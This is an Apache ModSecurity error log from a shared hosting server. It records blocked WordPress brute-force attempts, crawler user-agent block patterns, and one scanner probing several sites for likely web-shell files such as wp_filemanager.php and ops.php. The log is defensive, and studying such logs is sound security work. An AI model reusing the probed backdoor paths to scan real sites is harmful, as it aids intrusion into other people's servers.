[Tue May 26 16:27:59.020889 2026] [security2:error] [pid 795941:tid 796191] [client 172.86.66.156:51823] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.66.86.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV8tu2GQ_TLE_VHIp2s0wAAAP0"], referer: https://www.cagmedya.com/
[Tue May 26 16:27:59.021058 2026] [security2:error] [pid 795941:tid 796191] [client 172.86.66.156:51823] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV8tu2GQ_TLE_VHIp2s0wAAAP0"], referer: https://www.cagmedya.com/
[Tue May 26 16:27:59.215176 2026] [security2:error] [pid 795941:tid 796148] [client 85.208.96.194:51936] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.toronto121mortgage.com"] [uri "/liberty-village-king-west.php"] [unique_id "ahV8t-2GQ_TLE_VHIp2s4gAAANI"]
[Tue May 26 16:27:59.215304 2026] [security2:error] [pid 795941:tid 796148] [client 85.208.96.194:51936] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.toronto121mortgage.com"] [uri "/liberty-village-king-west.php"] [unique_id "ahV8t-2GQ_TLE_VHIp2s4gAAANI"]
[Tue May 26 16:27:59.889980 2026] [security2:error] [pid 795941:tid 795994] [remote 74.7.241.58:38134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV8t-2GQ_TLE_VHIp2s7AAApzQ"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:27:59.894382 2026] [security2:error] [pid 795941:tid 795988] [remote 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV8t-2GQ_TLE_VHIp2s7QAA9C4"]
[Tue May 26 16:27:59.894569 2026] [security2:error] [pid 795941:tid 796182] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV8t-2GQ_TLE_VHIp2s7QAA9C4"]
[Tue May 26 16:28:00.274793 2026] [security2:error] [pid 795941:tid 796082] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8t-2GQ_TLE_VHIp2s6AAAAJA"]
[Tue May 26 16:28:00.721493 2026] [security2:error] [pid 795941:tid 796126] [client 62.60.130.228:49520] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahV8uO2GQ_TLE_VHIp2tCAAAALw"]
[Tue May 26 16:28:00.910199 2026] [security2:error] [pid 795941:tid 796104] [client 162.211.125.6:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahV8uO2GQ_TLE_VHIp2tDgAAAKY"]
[Tue May 26 16:28:00.911498 2026] [security2:error] [pid 795941:tid 796143] [client 162.211.125.6:55954] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahV8uO2GQ_TLE_VHIp2tDAAAAM0"]
[Tue May 26 16:28:01.239410 2026] [security2:error] [pid 795941:tid 796198] [client 162.211.125.6:55966] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahV8ue2GQ_TLE_VHIp2tFQAAAQQ"]
[Tue May 26 16:28:01.614880 2026] [security2:error] [pid 795941:tid 796158] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8uO2GQ_TLE_VHIp2tEQAAANw"]
[Tue May 26 16:28:01.762137 2026] [security2:error] [pid 795941:tid 796165] [client 49.13.167.123:34926] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahV8ue2GQ_TLE_VHIp2tIAAAAOM"], referer: http://ucdc.co.in/
[Tue May 26 16:28:03.543807 2026] [security2:error] [pid 795941:tid 796121] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8uu2GQ_TLE_VHIp2tNwAAALc"]
[Tue May 26 16:28:05.874541 2026] [security2:error] [pid 795941:tid 796073] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8ve2GQ_TLE_VHIp2tYwAAAIc"]
[Tue May 26 16:28:07.702650 2026] [security2:error] [pid 795941:tid 796152] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8v-2GQ_TLE_VHIp2tiwAAANY"]
[Tue May 26 16:28:08.146933 2026] [security2:error] [pid 795941:tid 796170] [client 74.7.228.9:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "axum-vermogen.eu"] [uri "/cgi-sys/404.html"] [unique_id "ahV8wO2GQ_TLE_VHIp2togAAAOg"]
[Tue May 26 16:28:08.189952 2026] [security2:error] [pid 795941:tid 796110] [client 74.7.228.9:49936] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "axum-vermogen.eu"] [uri "/robots.txt"] [unique_id "ahV8wO2GQ_TLE_VHIp2tnQAAAKw"]
[Tue May 26 16:28:10.127810 2026] [security2:error] [pid 795941:tid 796092] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8we2GQ_TLE_VHIp2tzgAAAJo"]
[Tue May 26 16:28:11.043512 2026] [security2:error] [pid 795941:tid 796194] [client 159.69.14.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV8wu2GQ_TLE_VHIp2t6wAAAQA"]
[Tue May 26 16:28:11.827488 2026] [security2:error] [pid 795941:tid 796111] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8w-2GQ_TLE_VHIp2t8QAAAK0"]
[Tue May 26 16:28:11.917791 2026] [security2:error] [pid 795941:tid 796192] [client 159.69.14.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV8w-2GQ_TLE_VHIp2uBwAAAP4"]
[Tue May 26 16:28:13.308136 2026] [security2:error] [pid 795941:tid 796072] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8xO2GQ_TLE_VHIp2uGwAAAIY"]
[Tue May 26 16:28:14.829886 2026] [security2:error] [pid 795941:tid 796078] [client 62.28.146.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8xu2GQ_TLE_VHIp2uPwAAAIw"]
[Tue May 26 16:28:14.854213 2026] [security2:error] [pid 795941:tid 795987] [remote 172.104.164.56:44988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahV8xu2GQ_TLE_VHIp2uRwAAry0"]
[Tue May 26 16:28:15.870052 2026] [security2:error] [pid 795941:tid 796152] [client 198.244.226.56:35164] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.virgence.com"] [uri "/robots.txt"] [unique_id "ahV8x-2GQ_TLE_VHIp2uZgAAANY"]
[Tue May 26 16:28:15.870180 2026] [security2:error] [pid 795941:tid 796152] [client 198.244.226.56:35164] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.virgence.com"] [uri "/robots.txt"] [unique_id "ahV8x-2GQ_TLE_VHIp2uZgAAANY"]
[Tue May 26 16:28:17.225474 2026] [security2:error] [pid 795941:tid 796088] [client 54.39.0.57:36282] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.virgence.com"] [uri "/"] [unique_id "ahV8ye2GQ_TLE_VHIp2uhwAAAJY"]
[Tue May 26 16:28:17.225606 2026] [security2:error] [pid 795941:tid 796088] [client 54.39.0.57:36282] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.virgence.com"] [uri "/"] [unique_id "ahV8ye2GQ_TLE_VHIp2uhwAAAJY"]
[Tue May 26 16:28:17.255460 2026] [security2:error] [pid 795941:tid 796149] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8x-2GQ_TLE_VHIp2uZAAAANM"]
[Tue May 26 16:28:17.646417 2026] [security2:error] [pid 795941:tid 796170] [client 114.119.137.204:36693] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rainadelproperties.com"] [uri "/properties/user-submitted-property"] [unique_id "ahV8ye2GQ_TLE_VHIp2ujgAAAOg"], referer: https://rainadelproperties.com/properties/user-submitted-property
[Tue May 26 16:28:18.766562 2026] [security2:error] [pid 795941:tid 796130] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8ye2GQ_TLE_VHIp2uigAAAMA"]
[Tue May 26 16:28:18.836057 2026] [security2:error] [pid 795941:tid 796115] [client 74.7.244.4:35826] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "usteve.com"] [uri "/cgi-sys/404.html"] [unique_id "ahV8yu2GQ_TLE_VHIp2umwAAsRU"]
[Tue May 26 16:28:18.893362 2026] [security2:error] [pid 795941:tid 796141] [client 74.7.175.162:59152] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "usteve.com.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahV8yu2GQ_TLE_VHIp2unAAAyxA"]
[Tue May 26 16:28:20.482637 2026] [security2:error] [pid 795941:tid 796102] [client 74.249.212.138:7047] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV8zO2GQ_TLE_VHIp2utgAAAKQ"]
[Tue May 26 16:28:20.482812 2026] [security2:error] [pid 795941:tid 796102] [client 74.249.212.138:7047] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV8zO2GQ_TLE_VHIp2utgAAAKQ"]
[Tue May 26 16:28:20.544087 2026] [security2:error] [pid 795941:tid 796193] [client 114.119.128.56:58995] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahV8zO2GQ_TLE_VHIp2uuQAAAP8"], referer: http://glorodavionics.com/beta/index.php?route=product/category&path=72_79_141
[Tue May 26 16:28:20.554559 2026] [security2:error] [pid 795941:tid 796184] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8y-2GQ_TLE_VHIp2uqQAAAPY"]
[Tue May 26 16:28:21.450602 2026] [security2:error] [pid 795941:tid 796194] [client 74.249.212.138:7154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/x.php"] [unique_id "ahV8ze2GQ_TLE_VHIp2uyQAAAQA"]
[Tue May 26 16:28:21.450706 2026] [security2:error] [pid 795941:tid 796194] [client 74.249.212.138:7154] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/x.php"] [unique_id "ahV8ze2GQ_TLE_VHIp2uyQAAAQA"]
[Tue May 26 16:28:23.012671 2026] [security2:error] [pid 795941:tid 796180] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8ze2GQ_TLE_VHIp2u0wAAAPI"]
[Tue May 26 16:28:23.082560 2026] [security2:error] [pid 795941:tid 796075] [client 74.249.212.138:7135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/201.php"] [unique_id "ahV8z-2GQ_TLE_VHIp2u5gAAAIk"]
[Tue May 26 16:28:23.082667 2026] [security2:error] [pid 795941:tid 796075] [client 74.249.212.138:7135] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/201.php"] [unique_id "ahV8z-2GQ_TLE_VHIp2u5gAAAIk"]
[Tue May 26 16:28:23.982012 2026] [security2:error] [pid 795941:tid 796170] [client 74.249.212.138:7137] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/ops.php"] [unique_id "ahV8z-2GQ_TLE_VHIp2vAAAAAOg"]
[Tue May 26 16:28:23.982127 2026] [security2:error] [pid 795941:tid 796170] [client 74.249.212.138:7137] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/ops.php"] [unique_id "ahV8z-2GQ_TLE_VHIp2vAAAAAOg"]
[Tue May 26 16:28:24.289601 2026] [security2:error] [pid 795941:tid 796117] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8z-2GQ_TLE_VHIp2u8QAAALM"]
[Tue May 26 16:28:24.361669 2026] [security2:error] [pid 795941:tid 796129] [client 74.249.212.138:7045] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/samll.php"] [unique_id "ahV80O2GQ_TLE_VHIp2vCgAAAL8"]
[Tue May 26 16:28:24.361770 2026] [security2:error] [pid 795941:tid 796129] [client 74.249.212.138:7045] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/samll.php"] [unique_id "ahV80O2GQ_TLE_VHIp2vCgAAAL8"]
[Tue May 26 16:28:24.770754 2026] [security2:error] [pid 795941:tid 796113] [client 74.249.212.138:7054] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/ingfo.php"] [unique_id "ahV80O2GQ_TLE_VHIp2vDgAAAK8"]
[Tue May 26 16:28:24.770854 2026] [security2:error] [pid 795941:tid 796113] [client 74.249.212.138:7054] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/ingfo.php"] [unique_id "ahV80O2GQ_TLE_VHIp2vDgAAAK8"]
[Tue May 26 16:28:25.052932 2026] [security2:error] [pid 795941:tid 796149] [client 74.249.212.138:7056] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/c55cdler.php"] [unique_id "ahV80e2GQ_TLE_VHIp2vEgAAANM"]
[Tue May 26 16:28:25.053053 2026] [security2:error] [pid 795941:tid 796149] [client 74.249.212.138:7056] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/c55cdler.php"] [unique_id "ahV80e2GQ_TLE_VHIp2vEgAAANM"]
[Tue May 26 16:28:25.112829 2026] [security2:error] [pid 795941:tid 796198] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV80O2GQ_TLE_VHIp2vEQAAAQQ"]
[Tue May 26 16:28:25.688443 2026] [security2:error] [pid 795941:tid 796140] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV80e2GQ_TLE_VHIp2vIQAAAMo"]
[Tue May 26 16:28:25.940485 2026] [security2:error] [pid 795941:tid 796143] [client 92.118.39.194:48344] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV80e2GQ_TLE_VHIp2vHgAAAM0"]
[Tue May 26 16:28:26.198969 2026] [security2:error] [pid 795941:tid 796153] [client 74.249.212.138:7146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/error_log.php"] [unique_id "ahV80u2GQ_TLE_VHIp2vMgAAANc"]
[Tue May 26 16:28:26.199109 2026] [security2:error] [pid 795941:tid 796153] [client 74.249.212.138:7146] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/error_log.php"] [unique_id "ahV80u2GQ_TLE_VHIp2vMgAAANc"]
[Tue May 26 16:28:26.250427 2026] [security2:error] [pid 795941:tid 796167] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV80u2GQ_TLE_VHIp2vMQAAAOU"]
[Tue May 26 16:28:26.310333 2026] [security2:error] [pid 795941:tid 796173] [client 62.60.130.228:64005] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahV80u2GQ_TLE_VHIp2vPAAAAOs"]
[Tue May 26 16:28:26.330682 2026] [security2:error] [pid 795941:tid 796156] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV80u2GQ_TLE_VHIp2vNQAAANo"]
[Tue May 26 16:28:26.486179 2026] [security2:error] [pid 795941:tid 796082] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV80u2GQ_TLE_VHIp2vPwAAAJA"]
[Tue May 26 16:28:26.487654 2026] [security2:error] [pid 795941:tid 796176] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV80u2GQ_TLE_VHIp2vQgAAAO4"]
